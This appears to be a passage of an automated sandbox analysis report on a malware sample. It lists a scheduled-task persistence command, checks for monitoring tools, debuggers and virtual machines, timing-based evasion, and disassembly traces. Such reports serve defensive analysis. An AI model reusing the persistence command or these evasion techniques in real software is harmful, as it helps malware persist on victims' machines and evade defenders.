Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C122AAC push edx; mov dword ptr [esp], ebx 8_2_6C122AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152BF0 push eax; mov dword ptr [esp], ebx 8_2_6C152F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152BF0 push edx; mov dword ptr [esp], ebx 8_2_6C152F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C118435 push edx; mov dword ptr [esp], ebx 8_2_6C118449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C138460 push eax; mov dword ptr [esp], ebx 8_2_6C138A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11048B push eax; mov dword ptr [esp], ebx 8_2_6C1104A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1104E0 push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F1CFA push eax; mov dword ptr [esp], ebx 8_2_6C1A6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F1CFA push eax; mov dword ptr [esp], ebx 8_2_6C1A6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11A5A7 push eax; mov dword ptr [esp], ebx 8_2_6C11A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152620 push eax; mov dword ptr [esp], ebx 8_2_6C152954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152620 push edx; mov dword ptr [esp], ebx 8_2_6C152973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1606B0 push eax; mov dword ptr [esp], ebx 8_2_6C160A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1106A2 push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1286A1 push 890005EAh; ret 8_2_6C1286A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1106A6 push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1166F3 push edx; mov dword ptr [esp], ebx 8_2_6C116707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1106FD push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11070E push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11A777 push eax; mov dword ptr [esp], ebx 8_2_6C11A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120042 push eax; mov dword ptr [esp], ebx 8_2_6C120056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0EE0D0 push eax; mov dword ptr [esp], ebx 8_2_6C1A6AF6
Source: AD4q0qFvM8.exe Static PE information: section name: biazzcha entropy: 7.955559647188732
Drops PE files
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File created: C:\Users\user\AppData\Local\Temp\ELLRGATenShKoyKeRtXA.dll Jump to dropped file
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: D301C9 second address: D2FA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jl 00007FDAC0B0C7FCh 0x0000000d push dword ptr [ebp+122D002Dh] 0x00000013 jmp 00007FDAC0B0C7FAh 0x00000018 jmp 00007FDAC0B0C7FFh 0x0000001d call dword ptr [ebp+122D27B1h] 0x00000023 pushad 0x00000024 pushad 0x00000025 mov bh, al 0x00000027 add dword ptr [ebp+122D196Ch], edi 0x0000002d popad 0x0000002e xor eax, eax 0x00000030 jne 00007FDAC0B0C7FEh 0x00000036 jnc 00007FDAC0B0C7F8h 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 xor dword ptr [ebp+122D2EAEh], edx 0x00000046 mov dword ptr [ebp+122D38EFh], eax 0x0000004c mov dword ptr [ebp+122D17FCh], ebx 0x00000052 mov esi, 0000003Ch 0x00000057 cmc 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c mov dword ptr [ebp+122D2EAEh], ebx 0x00000062 lodsw 0x00000064 clc 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 cmc 0x0000006a mov ebx, dword ptr [esp+24h] 0x0000006e jnl 00007FDAC0B0C808h 0x00000074 nop 0x00000075 jbe 00007FDAC0B0C813h 0x0000007b push eax 0x0000007c je 00007FDAC0B0C804h 0x00000082 pushad 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB182F second address: EB1833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB1833 second address: EB1863 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 jmp 00007FDAC0B0C809h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB08EC second address: EB0909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAC110B294h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB0909 second address: EB090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB0A6C second address: EB0A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB0A70 second address: EB0A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB0BF3 second address: EB0C07 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDAC110B286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FDAC110B286h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB0C07 second address: EB0C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB0C0B second address: EB0C17 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDAC110B286h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB0DAB second address: EB0DC2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDAC0B0C7FCh 0x00000008 push eax 0x00000009 jno 00007FDAC0B0C7F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB0DC2 second address: EB0DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jne 00007FDAC110B2A8h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007FDAC110B286h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d ja 00007FDAC110B286h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB0DE5 second address: EB0DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB10AB second address: EB10B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB10B1 second address: EB10BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB10BA second address: EB10C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDAC110B286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB10C4 second address: EB10C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB10C8 second address: EB10DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDAC110B286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB10DA second address: EB10DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4047 second address: EB404C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB404C second address: EB40AE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDAC0B0C7F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007FDAC0B0C821h 0x00000013 pushad 0x00000014 jmp 00007FDAC0B0C808h 0x00000019 jmp 00007FDAC0B0C801h 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 pushad 0x00000024 jg 00007FDAC0B0C80Bh 0x0000002a jmp 00007FDAC0B0C805h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB40AE second address: EB40C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push edi 0x0000000b jbe 00007FDAC110B286h 0x00000011 pop edi 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB40C3 second address: D2FA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jnc 00007FDAC0B0C7FEh 0x00000010 pop eax 0x00000011 movzx ecx, di 0x00000014 push dword ptr [ebp+122D002Dh] 0x0000001a jmp 00007FDAC0B0C800h 0x0000001f cmc 0x00000020 call dword ptr [ebp+122D27B1h] 0x00000026 pushad 0x00000027 pushad 0x00000028 mov bh, al 0x0000002a add dword ptr [ebp+122D196Ch], edi 0x00000030 popad 0x00000031 xor eax, eax 0x00000033 jne 00007FDAC0B0C7FEh 0x00000039 jnc 00007FDAC0B0C7F8h 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 xor dword ptr [ebp+122D2EAEh], edx 0x00000049 mov dword ptr [ebp+122D38EFh], eax 0x0000004f mov dword ptr [ebp+122D17FCh], ebx 0x00000055 mov esi, 0000003Ch 0x0000005a cmc 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f mov dword ptr [ebp+122D2EAEh], ebx 0x00000065 lodsw 0x00000067 clc 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c cmc 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 jnl 00007FDAC0B0C808h 0x00000077 nop 0x00000078 jbe 00007FDAC0B0C813h 0x0000007e push eax 0x0000007f je 00007FDAC0B0C804h 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB41F2 second address: EB4222 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FDAC110B298h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 jnl 00007FDAC110B286h 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4222 second address: EB4227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4227 second address: EB425A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a and edx, 37D232A2h 0x00000010 lea ebx, dword ptr [ebp+12457F99h] 0x00000016 mov esi, dword ptr [ebp+122D2478h] 0x0000001c jg 00007FDAC110B292h 0x00000022 push eax 0x00000023 pushad 0x00000024 push ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4462 second address: EB447F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB447F second address: EB4484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4484 second address: EB44EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDAC0B0C7F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FDAC0B0C7FAh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FDAC0B0C7F8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov edx, ecx 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D246Ch], ebx 0x00000038 call 00007FDAC0B0C7F9h 0x0000003d jmp 00007FDAC0B0C7FEh 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push ecx 0x00000046 pushad 0x00000047 popad 0x00000048 pop ecx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB44EA second address: EB4505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4505 second address: EB4532 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FDAC0B0C7F6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FDAC0B0C806h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4532 second address: EB4536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4536 second address: EB4540 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4540 second address: EB4544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4544 second address: EB45AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FDAC0B0C7F8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000003h 0x00000024 xor dl, FFFFFF9Ah 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FDAC0B0C7F8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Ah 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 push 00000003h 0x00000045 mov ecx, dword ptr [ebp+122D38FBh] 0x0000004b sbb di, CA00h 0x00000050 push B3BCFB0Ch 0x00000055 push ebx 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB45AE second address: EB45B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E939DC second address: E939E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007FDAC0B0C7F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
